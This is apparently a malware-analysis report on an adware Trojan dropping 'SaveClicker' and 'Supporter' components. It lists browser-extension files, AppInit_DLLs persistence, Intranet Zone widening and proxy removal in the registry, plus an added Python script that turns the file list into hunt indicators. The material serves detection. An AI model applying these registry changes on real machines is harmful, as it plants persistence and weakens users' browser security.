%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.dll (26032 bytes)
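The file-activity listing above is long because the same five extension files are written once per browser per user profile. The script below is an added example, not code from Lavasoft or from the sample's author: it parses lines in the report's "path (N bytes)" format, collapses the per-profile prefix so that one hunt path covers every user, recognises Chromium extension IDs by their shape (32 characters from a-p), separates machine-wide drop locations (Program Files, All Users, GroupPolicy) from per-user ones, and discards the Temporary Internet Files desktop.ini churn that is not an indicator. The embedded sample lines are copied from the listing above; the `<profile>` placeholder and the noise and persistence markers are this example's own conventions.

```python
import re

# Constructed sample: a handful of "creates and/or writes" lines copied from
# the file-activity listing above (paths and sizes as the report shows them).
SAMPLE_FILE_ACTIVITY = r"""
%Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
%Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
%Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.dat (260 bytes)
%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe (26944 bytes)
%System%\GroupPolicy\Machine\Registry.pol (264 bytes)
%System%\GroupPolicy\gpt.ini (315 bytes)
%Program Files%\SaveClicker\vWxdeLnb7d.x64.dll (30600 bytes)
%Program Files%\Supporter\Supporter.dll (272917 bytes)
%Program Files%\Supporter\SupporterSvc.dll (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHIRSTUV\desktop.ini (67 bytes)
"""

ENTRY_RE = re.compile(r"^(?P<path>.+?) \((?P<size>\d+) bytes\)$")
# Per-user profile segment right after the Documents and Settings root.
PROFILE_RE = re.compile(r"^%Documents and Settings%\\([^\\]+)\\")
# Chromium extension IDs are 32 characters drawn from a-p.
EXT_RE = re.compile(r"\\Extensions\\([a-p]{32})\\")
# vendor\product segment between Application Data and User Data.
BROWSER_RE = re.compile(r"\\Application Data\\(.+?)\\User Data\\")
NOISE_MARKERS = ("\\Temporary Internet Files\\",)   # IE cache housekeeping (assumption)
PERSISTENCE_PREFIXES = (                              # machine-wide locations (assumption)
    "%Program Files%\\",
    "%Documents and Settings%\\All Users\\Application Data\\",
    "%System%\\GroupPolicy\\",
)


def parse_entries(text):
    """Return (path, size) for every 'path (N bytes)' line; ignore anything else."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append((m.group("path"), int(m.group("size"))))
    return entries


def normalize_profile(path):
    """Replace the per-user profile segment with <profile> so one IOC covers all users."""
    m = PROFILE_RE.match(path)
    if not m:
        return path
    return "%Documents and Settings%\\<profile>\\" + path[m.end():]


def triage(text):
    result = {
        "extension_ids": set(),   # extension IDs seen under any Extensions directory
        "browsers": set(),        # vendor\product segments that received the extension
        "profiles": set(),        # user profiles whose Local Settings were written
        "persistence": [],        # (path, size) in machine-wide locations
        "iocs": set(),            # deduplicated, profile-normalized hunt paths
        "noise": 0,               # cache housekeeping lines dropped
    }
    for path, size in parse_entries(text):
        if any(marker in path for marker in NOISE_MARKERS):
            result["noise"] += 1
            continue
        if path.startswith(PERSISTENCE_PREFIXES):
            result["persistence"].append((path, size))
            result["iocs"].add(path)
            continue
        prof = PROFILE_RE.match(path)
        if prof:
            result["profiles"].add(prof.group(1))
        ext = EXT_RE.search(path)
        if ext:
            result["extension_ids"].add(ext.group(1))
            browser = BROWSER_RE.search(path)
            if browser:
                result["browsers"].add(browser.group(1))
        result["iocs"].add(normalize_profile(path))
    return result


if __name__ == "__main__":
    r = triage(SAMPLE_FILE_ACTIVITY)
    print("extension IDs:", sorted(r["extension_ids"]))
    print("browsers hit:", sorted(r["browsers"]))
    print("profiles written:", sorted(r["profiles"]))
    print("machine-wide drops:")
    for path, size in r["persistence"]:
        print(f"  {path} ({size} bytes)")
    print("hunt paths:")
    for p in sorted(r["iocs"]):
        print("  " + p)
```

Run against the full listing, the twelve sample lines reduce to one extension ID, four browsers, four profiles and eleven distinct hunt paths; the extension ID and the `%Program Files%\Supporter` and `SaveClicker` directories are the indicators worth checking on other hosts, while the Content.IE5 desktop.ini writes are dropped.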

Registry activity

The process %original file name%.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 78 77 F2 55 1F 88 C8 DC F8 70 F7 00 BB 01 20"

The process rundll32.exe:892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 FD B5 EC 3E 79 55 29 C6 0B 76 37 DE E4 F2 6A"

The process rundll32.exe:1216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1F E7 38 1D 2D 98 30 A3 D9 05 BF DF 2F 04 6A 25"

The process regsvr32.exe:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 FE 3A 4B 87 4D 4C FE 13 26 44 07 7B 70 90 29"

The process 4t0K2gExXKV.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"InstallDate" = "20141109"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"iiid" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"iiid" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"dbaf3ce3" = "/P////%%"
"587b5709" = "V/////%%"
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"DisplayName" = "Supporter 1.80"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svpath" = "c:\progra~1\suppor~1\SupporterSvc.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"bbf88800" = "///%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"
"0dc3ee96" = "/P////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svx" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svt" = "1415499614"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"Publisher" = "SaveClicker"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"dlpath" = "c:\progra~1\suppor~1\suppor~1.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"svn" = "Supporter"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"usr.1" = "oCrXTf6789/XZTVNPR"
"usr.0" = "21/piAXZTVNPRJLFHw"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs" = "c:\progra~1\suppor~1\suppor~1.dll"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"CategoryName" = ""

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"340d3099" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 8B 59 48 55 C7 A0 4B 60 EF A9 0D 8C F0 9D 65"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"
"6185d035" = "VP/h/CP/V//l////"
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"data.0" = "YjrXT547KXyi2VNPRJ1MuUFxqLrsWisOQN7iqhhg8TH3YZr0E"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"c24899a6" = "MP/f/CF/Mx/l/C/////%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c/Au/YZ/Z//e/B2/N//l////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"uuid" = "b884ccde-4160bcc6-a8a67a25"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"LRTS" = "0"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"n" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"NoRepair" = "1"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"587b5709" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"usr.0" = "21/piAXZTVNPRJLFHw"
"usr.1" = "oCrXTf6789/XZTVNPR"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"State" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un /uq"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Install_Dir" = "%Program Files%\Supporter"
"LRTS" = "0"
"svi" = "0"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c/Au/YZ/Z//e/B2/N//l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"date" = "1415499614"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"data.1" = "FldGxS3/Ythm7PRJLFnmaqtOr7VskylRUc0kEmdbLVKd94JiOTfv"
"data.0" = "YjrXT547KXyi2VNPRJ1MuUFxqLrsWisOQN7iqhhg8TH3YZr0E"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"uuid" = "b884ccde-4160bcc6-a8a67a25"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}]
"40030ae4" = "%Program Files%\Supporter\Supporter.dll"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"340d3099" = "///%"
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\00000000]
"493c7345" = ""

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"Version" = "22021985"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"data.1" = "FldGxS3/Ythm7PRJLFnmaqtOr7VskylRUc0kEmdbLVKd94JiOTfv"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]
"date" = "1415499614"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{40030ae4}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"
"a0743acc" = "N/////%%"

The Trojan widens Internet Explorer's Intranet Zone, which runs with more permissive security defaults than the Internet Zone. It first maps all local (intranet) sites not listed in another zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

It also maps all network paths (UNC shares) to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

and all sites that bypass the proxy server to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4\eae10f9d]
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_40030ae4]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process gzfJ2GIHr9X.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}]
"SilentUninstall" = "%Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe /s /n /i:ExecuteCommands;UninstallCommands %Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.exe"

